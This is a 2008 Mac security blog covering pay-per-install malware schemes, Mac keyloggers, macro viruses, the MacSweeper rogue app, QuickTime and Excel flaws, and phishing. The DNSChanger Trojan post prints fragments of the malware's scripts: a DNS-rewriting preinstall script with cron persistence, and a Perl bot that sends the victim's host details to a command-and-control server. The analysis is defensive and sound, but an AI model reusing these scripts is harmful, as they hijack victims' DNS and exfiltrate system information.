Thursday, January 31, 2008

Malware Retailers Includes Trojan for Mac

As I mentioned last time, it is possible that these retailers will also include binary for Mac.

Now it's confirmed, as I was surfing my webmaster account this morning, I went to "Galleries" page (this contains thousand of links to different porn sites) and noticed the name of the codec it is trying to install "qazcodec4481.exe". I reckon one of the installer of Trojan DNS Changer is "qazcodec1000.dmg".

The installation strategy of this malware always looks like this.

Beware of this trick!

Wednesday, January 30, 2008

Pay-Per-Install A Malware Retail Business

Organize cyber-criminals introduces a new retail business Pay-Per-Install. This business primarily entice webmaster to join the gang and promises to pay 350$ for every 1000 install.

Like any other business, there's always a competition. Another pay-per-install retailer claims to be the best partner.

The deal behind this is you have to register or sign up for an account. Then, they will reply with your login credentials and link to your installer. The email content will look like this.

Hey John,

Thank you for registering TheInstalls Affiliate program.
We doing the best to help You make more money with us.
You can start right away, everything ready!

Below your login details and URL for EXE:
URL to login:
Login: john
Password: w5yJY6fSgp
EXE (exe generation will take about 30-40 mins):

Remember we offer payments on request for webmasters making more then 10000 installs per day. No shave, no hold, no bullshits, just a lot of MONEY :)

Have a nice day, Dear Partner!
-- TheInstalls team

**Please note that names and password were modified to prevent accidental installation of the malware.**

After logging-in to your account, they will introduce an affiliates bundling promo tools that will help maximize your profit.

This business is a "one stop shop" of malwares that includes backdoor, trojan, spyware and worm. You just need to install this tool and they will serve everything for you including sites, content and all other affiliated binaries. Scary!

So now, the webmaster's websites serving this pest will just need to logged-in to his account to check and monitor the count of installs and earnings.

Counting malware infection is now a $$ business!

These binaries are not yet detected by most Security softwares. VirusTotal returned 20% detection out of 32 scanners and searching keyword "pay-per-install" in google will give you 20,000 results. There must be a serious business out there.

As of the moment, this business carries binaries that works only in Windows platform. But remember, it is possible that this pest will also include binary for Mac just like Zlob codec crosses over and produced Trojan DNSChanger.

Saturday, January 26, 2008

Snoop, Sneak, Sniff

Mac users are more likely affected by tracking threats than malware.

Why? Let's start by defining what is a tracking threat.

Tracking threat are software or application that snoop user's activity, sneak password and sniff out private information. Software or applications such as keyloggers and sniffers are considered as tracking threats and they are vastly available over the internet.

This type of software/application are also classified as grayware. Graywares are not considered as malwares and they are not even dangerous by itself. However, just like a kitchen knife, if it falls to a wrong guy it will definitely poses threat to the user and to other people as well.

Let's take a look on LogKext.

Downloaded file: (107,080 bytes)

LogKext is the only kernel-based freeware keylogger for Mac OS X. It is controlled by a command-line client called logKextClient.

LogKext.pkg is the installer that contains eight different packages. During the installation process, the user is required to enter the administrator or root user password to authenticate.

Below are the packages and its descriptions.

logkextclient.pkg - This package contains logKextClient, which is in Mac universal binary format. This binary file is the interactive client of LogKext, which also manages the output logfile, encryption controls and daemon preferences.

logkextdaemon.pkg - This package contains logKextDaemon, which is in Mac universal binary format. This binary is a daemon program that runs in background and manages the keylogging activity.

logkextkeymap.pkg - This package contains property list file, logKextKeymap.plist. The list includes identifiable keys such as numbers, letters (upper and lower case) and characters.

logkextkeygen.pkg - This package contains a logKextKeyGen, which is in Mac universal binary format. This binary is responsible for recording or logging keyboard typed information.

Logkext-1.pkg - This package contains another package named LogKext.kext, which contains a binary file LogKext. LogKext is the main program responsible for intercepting keyboard events by using IOHIDSystem and IOHIKeyboard classes in the kernel.

logkextReadme.pkg - This package contains LogKext Readme.html, which includes install and uninstall guide, release notes and frequently asked questions.

logkextuninstall.pkg - This package contains LogKextUninstall.command, which is a terminal shell script that stops logKext from running and removes it's related files.

The packages were installed in this order:


The following files were created:

LogKext Readme.html
/Library/Application Support/logKext/logKextDaemon
/Library/Application Support/logKext/logKextKeyGen
/Library/Application Support/logKext/logKextKeymap.plist

This program can monitors and record user's keystrokes including username, password, PII, private conversations, typed-in urls and more.

So, imagine if this piece of software went to the wrong hands ?

It is more scary when you thought you have downloaded and installed a clean application, but with undocumented details there's more hidden or unexplainable features that could work in background.

Let's take a look on Keylogger X.

Downloaded file: KeyloggerX.dmg.sit (768,805 bytes)

Inside this image are the following files:

Disclaimer.rtf - This document informs the user that "You are held resposible for your actions". Check the full disclaimer here.

Keylogger X - This is the binary file in Prefered Executable Format File (signature start with "Joy!peffpwpc").

Read Me.rtf - This document describes this program as "Keylogger X is designed to run on OSX. The logged file is saved in the users preference folder called "User Preferences". "

Ok, let's run and check this program. Oops, there's nothing on your screen, you cannot even search for "User Preferences" folder. Where? Nobody knows!

Is it running in background ?

Upon checking the code, this program imports 3 containers with over 900 imported symbols that includes multimedia and networking.
From the data section, you will find more interesting strings.

Congratulations! You just installed a "more efficient keylogger".

The behavior of this program is not acceptable and absolutely real threat to users.

Monday, January 21, 2008

Let's Go Retro with Macro

Macro viruses started in late of 1990's and since then it never stopped. There are thousands of threats found in MS Office for Windows and they exist from documents like Word, Excel, PowerPoint, Access, Visio and Project. The impact of these threats varies from very destructive behaviour like deleting files to annoying scary jokes.

Although today, these threats are not that aggressive as we have seen 10 years ago but they still exist. It is important to understand the possibility that one day this threat may affects Mac users as well.

What is Macro ?

It is a symbol, name or key that represents a list of commands, actions or keystrokes. It is used to automate repetitive task. It is commonly seen in documents like Word, Excel, PowerPoint and even Outlook.

How Macro is created?

There are two ways:

(1) Macro Recorder

Macro recorder can create simple macros by recording user's action or keystrokes and associate it to a shortcut keys. So, the user can easily play back the recorded macro as often as needed.

Example, I want to display the words "Useful Macro" in Word document whenever I type shortcut key Control+R. This can be done by simply recording it. Check the screenshot here.

By default this is stored in, which means the recorded macro could work to every single document opened.

(2) Visual Basic Editor (VBE)

Advance macros uses Visual Basic for Applications programming.

For further discussion, you can check your favorite search engine with the following keywords: VBA, Visual Basic for Applications programming, Macros with VBE

What makes Macro a threat ?

Old macro viruses uses commands such as AutoExec, AutoNew, AutoOpen, AutoClose and AutoExit. These are auto macros that has the ability to auto execute. However, recent malicious documents are not limited to these commands.

How would you know if the document has macros ?

MS Office displays this warning below if the document you are trying to open has macros.
You can simply "Disable Macros" and continue working with the document.

By default, MS Office macro security setting is enabled. You can manually turn on and off this setting on Application menu, click Preferences and Security or by pressing the shortcut key "Command+,".

You can also view the macro code from Visual Basic Editor by pressing "Alt+F11".

Below are screenshots of real malicious macros in Word, Excel and PowerPoint.

Obviously, these malicious macros works on Windows but imagine if those codes were meant to work on Mac.

In summary, malicious macros are cross-platform threats. They could work and damage both Mac and Windows pc users. Awareness of these threats are very important in protecting our daily computing lives.

Friday, January 18, 2008

A Deeper Look On MacSweeper

Do you think Macsweeper is not a rogue application? Ok, let's take a deeper look and see what it does.

File Size

MacSweeperSetup.dmg 1.5 MB (1,600,201 bytes) 2.6 MB (2,563,303 bytes)


Like other rogue application, MacSweeper uses a deceptive sales and marketing technique to get into users' system. It does not have the capability to propagate or spread by itself, but it arrives as an Ads where it redirects users to this bogus webpage.

Behind this page is a SWF flash file and javascripts that records the traffic and clicks.

After the fake display of scanning process, this bogus website displays an Alert box.

The buttons "Ignore" and "Remove" are useless since it will continue to display another message box, and this time the user has no other option but to click "OK". Check the screenshot here.

Clicking "Ok" triggers the downloading of MacSweeperSetup.dmg. Inside this DMG file is the rogue application -

MacSweeper does not require root admin password to execute and it remains in Download folder unless the user manually drag it to another location.


Lookup information of A NS NS

The screenshot shows that,, and are sharing same name server IP address.

Cleanator is a rogue application that works in Windows platform.

Behaviour & Analysis

Most of the files inside are images file (in PNG file format). Let's check the other files ...

PkgInfo contains strings "APPL????"

Database.plist contains 6390 cookie data that looks like this:


TODO.txt contains list of things to do that includes its current limitation, bugs and features. Interesting info from this text file is this:

"18. When update in process arert of new version can come, and fuck everithing"

You may check the complete list here.

Info.plist contains the following strings:

Identifier: com.KIVViSoftware.MacSweeper
Package Type: APPL
Executable: MacSweeper
Update URL:

The file MacSweeper inside MacOS folder is a binary file in universal binary format. Which means, this could work both in PPC and x86.

From the screenshot above, you will think that this application has scanned unwanted files from your system. However in background, MacSweeper executes the following shell command:

find "%@" ! -empty -and -type f > /private/tmp/com.MacSweeper.found.tmp;
file -f /private/tmp/com.MacSweeper.found.tmp -kn | grep 'universal binary' | sed -e 's/: *Mach.*//g' > /private/tmp/com.MacSweeper.found2.tmp;

lipo "%@" -thin %@ -output "%@.lipo"&& mv -f "%@.lipo" "%@";

During the scanning process, it drops the following temporary files:


It then uses these files to display the scan result. This application does not scan for unwanted files, instead it is giving you list of legitimate information installed in your system.

And it does not end here, few minutes after displaying the scan result, it will display a bugging screen as shown below:

What! privacy violation with your own legitimate files ? Absolutely, not right.

From the code, this application unlocks more feature and displays the message below once the user input a valid serial code.

Thank You! You made me a bit hapier :)

Definitely, this application is not just a rogue but also a junkware.

Wednesday, January 16, 2008

QuickTime 7.4 Fixes Multiple Vulnerabilities

Apple recently released QuickTime 7.4 which includes fixes for multiple vulnerabilities. This new version addresses four issues that affects Mac OS X 10.2.9 or later, Windows Vista and XP SP2.

The vulnerabilities that was addressed includes following:

(1) Memory corruption in QuickTime's handling of Sorenson 3 video files.

(2) Memory corruption in QuickTime's handling of Macintosh Resource records in movie files.

(3) Memory corruption in QuickTime's parsing of Image Descriptor (IDSC) atoms.

(4) Buffer overflow in processing a compressed PICT image.

However, the recent buffer overflow found in "QuickTime RSTP response" still remains unpatched.

Thus, Quicktime users are advised not to play streaming media that uses rstp protocol (rstp:\\) until a fix is made available.

Zero Day Exploit: MS Excel Allows Remote Code Execution

There is a zero day flaw found in Microsoft Excel and this vulnerability affects the following version:

Microsoft Office Excel 2003 Service Pack 2
Microsoft Office Excel Viewer 2003
Microsoft Office Excel 2002

Microsoft Office Excel 2000
Microsoft Excel 2004 for Mac

What causes this threat ?

When a user opens a specially crafted Excel file and that has a malformed header information, the system encounters unspecified error, which can be exploited by malicious users and could lead to execution of arbitrary code.

According to Microsoft, there is an active attacks that currently exploits this vulnerabiltity. Thus, users are advised not to open untrusted Excel file.

Monday, January 14, 2008

MacSweeper First Rogue Application in Mac

Beware! First rogue application in Mac is here.

This rogue application displays a fake information, pretending that it is scans the user's system. It then displays a fake Alert, showing that bad cookies and files were detected.

Once the user click "Remove", it will download MacSweeperSetup.dmg and install - the rogue application.

There are two images or looks that links to this rogue application.

(1) The screenshot shown above is the image displayed when you visit this url:

(2) The screenshot shown below is the image displayed when you get linked or redirected (Ex. you have been linked from Google.) to this url:

*** This links to rogue site; Use at your own risk! ***

As of this writing, no security scanners detects it.

MacSweeper does not need root admin password to execute the application. In fact it is just a portable application and no installation required. Here's the screenshot below:

Sunday, January 13, 2008

Zero Day Exploit: Buffer-overflow in Quicktime Player

After two QuickTime flaws and Quickspace worm last December, another vulnerability was discovered this month affecting both Windows and Mac users.

The zero day vulnerability was found when Quicktime encounters a RSTP (Real-Time Streaming Protocol) link ex. rstp:// and no custom port has been specified, it handles the call by scanning port 554. However, if port 554 server is closed, Quicktime automatically switch to HTTP protocol and scans port 80, where the server returns 404 error message. If the returned HTTP error message from the server is so long, QuickTime media link file does not know how to handle this message - because it lacks input validation, thus causes buffer overflow.

This vulnerability can be exploited by a malicious application or website, which then allows execution of arbitrary codes on the user's system.

Luigi Auriemma, an italian security researcher has discovered this flaw and posted a bug report with proof-of-concept exploit code.

Thursday, January 10, 2008

Analysis of OSX Trojan DNS Changer

File Size
DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)

This malicious code does not spread and propagate by itself. It uses an ancient yet effective Social Engineering technique to entice users to manually install the program. This trojan disguises as video codec and associates itself to a shared and free download videos. It was first seen and linked to porn sites but later it was also linked to funny videos and seen as splogs (spam blog).

Is this in-the-wild ? Yes.

Installation & Behaviour
A user visits a rogue site and download a fake video codec. Check the screenshot here.

The disk image file will be automatically mounted but not extracted. This means, the user has to manually install the downloaded file.

The downloaded installer - Install.pkg, contains the following files:

Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart

Followed by, which contain information of files to install.

lsbom -s install.pkg/Contents/

It then access the files description.plist and PkgInfo, which gives the following information:

Version: 1.0
"Its a suppa puppa desc yo"
Title: MacCodec

PkgInfo: pmkrpkg1

Followed by BundleVersions.plist for version informations.

The installer comes with a "License Agreement". Upon clicking "Continue", a message box will display requiring the user to click "Agree" to continue the installation process.

Ok, let's look further on the malicious codes.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contains shell script that does the dirty works.

Postinstall and postupgrade contains exactly the same code, as well as preinstall and preupgrade.

Preinstall is invoked after the user agreed on the License Agreement. This trojan does not have damaging payloads, except it only modifies users' DNS setting. Let's check the code.

Code Analysis

Preinstall script:

path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')<<>

Scutil, it retrieves user's primary network interface.

get State:/Network/Global/IPv4

It then modifies DNS name server IP to
s1= and s2=

d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS

**Take note: IP addresses may change per variant.

It checks for a crontab file - plugins.settings, in this location "/Library/Internet Plug-Ins". This file is a marker, it indicates whether this trojan has been previously installed or not.

exist=`crontab -l|grep plugins.settings`

If plugins.settings does not exist (meaning, it was not yet installed), the installation will proceed by dropping a temporary file \cron.inst

if [ "$exist" == "" ]; then
echo "* * * * * \"$path/plugins.settings\">/dev/null 2>&1" > cron.inst

Cron.inst has the following strings:

* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

It will execute cron.inst using Crontab command.

crontab cron.inst

Cron.inst executes another script, Quicktime.xpt. This is found in this location /Library/Internet Plug-Ins/

"/Library/Internet Plug-Ins/QuickTime.xpt"

In background, it will create a temporary file named, 1.

>/dev/null 2>&1

QuickTime.xpt redirects its output to this file instead of popping error or script command to the user's screen.

Once cron.inst is executed, preinstall script will delete this temporary file.

rm -rf cron.inst

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to this location
/Library/Internet Plug-Ins/.

Like preinstall script, QuickTime.xpt checks for users network information, attempt to modify DNS name server settings, checks the existence of QuickTime.xpt and if exist, it creates cron.inst, execute it and delete temporary file, 1.

Postinstall script:

path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

It executes sendreq, which is a perl script and deletes it.

SendReq Script:

This perl base bot acts as a backdoor client component and communicates to a remote server through socket.

use IO::Socket;

It uses MIME base64 encoding to transmit messages through HTTP.

use integer;
my $eol = $_[1];
$eol = "\n" unless defined $eol;

my $res = pack("u", $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;

$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
return $res;

The bot command-and-control server:

my $server="";

**Take note: IP addresses may change per variant.

Executes uname -p command to retrieve victim's operating system processor type and hostname for the IP address.

my $server=""; my $cmd='uname
my $cmd='uname -p;echo ";";hostname';$cmd=~s/\n//g;

Encode the gathered information, indicating "mac".

my $uniqid=encode_base64("mac;".$cmd); $uniqid=~s/\n//g;

Send a request to remote server.

my $request="GET / HTTP/1.1\r\nAccept-Language: $unigid\r\nHost: $server\r\n\r\n";

This bot sends a request to the remote server, attempting to establish a connection through TCP port 80.

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;

Captured packet looks like this:

It sends victim's information in base64 encoded strings:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host:

Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host:

From this information, the C&C (command-and-control) server can determine the total count of infection, IP address and the geographical location of that infected host.

Furthermore, later versions of this trojan scripts are obfuscated making it little difficult for security analyst and researchers to read the code.


Trojan DNSChanger is as simple as changing DNS settings - no complication and no destructive behavior. These are simple scripts that are widely available online, built into mac installer and deployed to several existing fake codec domains.

The lesson here is that malwares or threats in Mac does not have to be complicated. With the vast information available online, it is possible that an ordinary person without programming background - also called script kiddie, can cause interruption and damage to our daily lives.

Sunday, January 6, 2008

Phish Facebook, Phish Myspace too!

Investigating the recent Facebook phishing attack has resulted more information including Myspace phising sites and Gambling Casino spams.

Let's start with this screenshot below.

Let's perform DNS lookup with the FQDN -

As you can see, this phising domain runs in a double fast flux DNS service, which means both NS and A records are dynamic and constantly changing. Observing further the activity, there are 10 round robin addresses that changes every minute and this rogue network host thousands of domain. So, shutting down these fakes sites are not that easy!

The screenshot below is a Myspace phising site.

more links ...

Aside from phising sites, this node (particularly, is also responsible for Gambling Casino spams (found 6 active mail domains) and even marijuana scam (like and

In summary, phising and scam spams are cross-platform web base attack. It aims to steal your identity and your money!

Mac and iphone users are not exempted.

Saturday, January 5, 2008

Phising Facebook Still Up!

Beware! Phising attack in Facebook has been luring for days now and still the site is up online.

This fake website aims to steal your log-in credentials allowing the attacker to get into your account. Victims of this phising site does not direct the user to the account, instead after stealing your information, it goes to the legitimate log-in at

This information has first blogged by Scot Fish.

Wednesday, January 2, 2008

Impersonating Mac Browser

As I mentioned last topic, Zlob fake codec sites are smart enough to know whether you are running on Windows or Mac. If you are an analyst or researcher and would like to download the DMG file, you cannot simply modify the URL or force the browser to download it, although you can modify the file extension but still the downloaded file will contain MZ header – which mean, Windows Executable.

To understand how this happens, let's capture the http request using Ethereal and check the data.

The user browser sends User-Agent header to the requested page and this provides information such as Application Name, Compatibility, Platform and Version, Accepted language and the users Web Browser.

So, now you can figure out why.

If you are running in Windows and you want to download Zlob fake codec for Macintosh, you can simply send fake User-Agent header. This means, you are sending hand crafted http request to the server; This is impersonating the Mac browser.

There are many tools that can help you perform this job, few names like curl, fiddler and malzilla -
known as malware website hunting tool.

The screenshot below shows how Malzilla download the DMG file in Windows.

Tuesday, January 1, 2008

Warning! Spyware Found

create animated gif
This is an example of a rogue anti-spyware application. These are software/application that uses deceptive sales technique and false positives to convince users to pay for license. Their websites looks like reliable, informative and convincing - usually claims as one of the best security software.

Much of these rogue application websites appears in Google search when using keywords such as IEDefender, Privacy Control, Antispy-pro, WinSpyKiller, spy-bot and the likes. These may also arrive to users via spammed e-mails, pop-ups, banner advertisements and sometimes from malwares.

Does it work in Mac OS X? No (as of this writing) although some rogue online scanners seemed to be working and catching malwares in Mac but everything is just for the good show but they are fakes!

These rogue applications currently supports Windows platform (downloads EXE installer), but like fake codecs, we never know one day it's gonna be in OS X as well.

For awareness, here's the list of rogue anti-spyware websites.

Have a Malware free day and Happy New Year!